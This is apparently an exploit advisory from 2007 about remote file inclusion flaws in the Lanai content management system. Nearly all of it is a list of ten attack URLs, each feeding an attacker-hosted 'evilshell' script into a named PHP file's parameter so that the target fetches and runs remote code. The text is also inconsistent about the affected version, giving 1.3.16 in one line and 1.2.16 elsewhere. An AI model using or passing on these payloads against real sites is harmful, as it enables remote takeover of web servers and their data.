Lanai CMS version 1.3.16 suffers from remote file inclusion vulnerabilities.
abca33cc1740c10f459647dcd24b67c0c55075b5566e3dfd01b5d464058a0a5b
Lanai cms_v1.2.16 Content Management System Remote File Inclusion
----------------------------------------------------------------------------------------------------------|
Download :http://downloads.sourceforge.net/la-nai/lanai-cms_v1.2.16.tar.gz?modtime=1188204187&big_mirror=0|
----------------------------------------------------------------------------------------------------------|
-------|
Exploit|
-------|
http://site.com/adodb.inc.php?path=http://host.com/evilshell?
http://site.com/adodb.inc.php?file=http://host.com/evilshell?
http://site.com/Smarty.class.php?smarty_compile_path=http://host.com/evilshell?
http://site.com/index.php?modfunction=http://host.com/evilshell?
http://site.com/send.php?modfunction=http://host.com/evilshell?
http://site.com/checkoutconfirm.php?modfunction=http://host.com/evilshell?
http://site.com/checkoutsave.php?modfunction=http://host.com/evilshell?
http://site.com/prodview.php?modfunction=http://host.com/evilshell?
http://site.com/faqviewgroup.php?modfunction=http://host.com/evilshell?
http://site.com/xml_domit_rss_shared.php?pathToLibrary=http://host.com/evilshell?
-----------------|
Timeline:10.11.07|
-----------------|
------|
Author|
------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member ..."we're not the only ones but we're the best"